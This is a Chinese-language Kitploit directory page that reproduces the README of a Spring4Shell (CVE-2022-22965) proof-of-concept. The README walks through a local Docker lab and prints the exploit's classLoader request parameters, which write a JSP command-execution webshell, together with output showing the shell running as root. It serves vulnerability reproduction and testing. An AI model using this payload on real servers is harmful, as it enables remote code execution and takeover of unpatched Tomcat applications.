Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Spring4Shell-POC — 重现Spring4Shell(CVE-2022-22965)远程代码执行漏洞,通过Python利用脚本,在Apache Tomcat上部署JSP webshell进行测试和验证。 | Kitploit
工具/GitHubGitHub/weijilab/spring4shell-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用
GitHubweijilab/spring4shell-poc

Spring4Shell-POC

重现Spring4Shell(CVE-2022-22965)远程代码执行漏洞,通过Python利用脚本,在Apache Tomcat上部署JSP webshell进行测试和验证。

查看仓库
1131094年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Spring4Shell-POC

Spring4Shell 漏洞本地复现过程

环境准备

  • 环境 docker、docker-compose

  • mvn 打包,生成 ./target/ROOT.war

mvn package
  • 启动服务
docker-compose up -d
  • 关闭服务
docker-compose down 

复现过程

  • 运行脚本
python3 spring-4-shell-exp.py --url "http://127.0.0.1:8080"
  • 第一次运行

第一次运行

  • 第二次运行

第二次运行

  • 执行过程
➜  spring4shell-poc clear             
➜  spring4shell-poc python3 spring-4-shell-exp.py --url "http://127.0.0.1:8080"
The vulnerability exists, the shell address is :http://127.0.0.1:8080/tomcatwar.jsp?pwd=j&cmd=whoami
got response: 
➜  spring4shell-poc clear
➜  spring4shell-poc python3 spring-4-shell-exp.py --url "http://127.0.0.1:8080"
The vulnerability exists, the shell address is :http://127.0.0.1:8080/tomcatwar.jsp?pwd=j&cmd=whoami
got response: root

//
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } -

➜  spring4shell-poc 

  • docker容器中可以看到在tomcat应用服务中创建了一个jsp文件

spring-4-shell-web

  • web也可以直接访问

spring-4-shell-web

注意点

  • spring-4-shell-exp.py 中data的数据
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i 
if ("j".equals(request.getParameter("pwd"))) {
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    while ((a = in .read(b)) != -1) {
        out.println(new String(b));
    }
}
%{suffix}i
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
  • 打印tomcat配置参数 通过 src/main/webapps/print.jsp 文件,在运行时可以打印tomcat属性配置
下载工具